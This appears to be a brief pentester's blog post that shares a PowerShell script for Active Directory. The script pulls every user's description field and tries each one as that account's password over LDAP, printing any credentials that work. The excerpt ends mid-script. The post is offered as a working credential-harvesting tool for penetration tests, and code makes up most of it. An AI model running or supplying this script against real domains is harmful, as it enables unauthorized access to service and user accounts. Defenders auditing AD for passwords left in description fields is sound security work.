Dumbest pentesting script to ever succeed

Scanning for passwords in description fields in AD

In today’s episode of “I can’t believe this is real”, the below Powershell script has a better than average likelyhood of handing out service account credentials.

$users = Get-ADuser -filter * -Properties description
$currentDomain = "LDAP://" + ([ADSI]"").distinguishedName

foreach ($user in $users) {
    if ($user.Description -ne $null) {
        $lookup = New-Object System.DirectoryServices.DirectoryEntry($currentDomain, $user.SamAccountName, $user.Description)
        if ($lookup.Name -ne $null) {
            write-host "We have a valid credential with $($user.SamAccountName) $($user.Description)"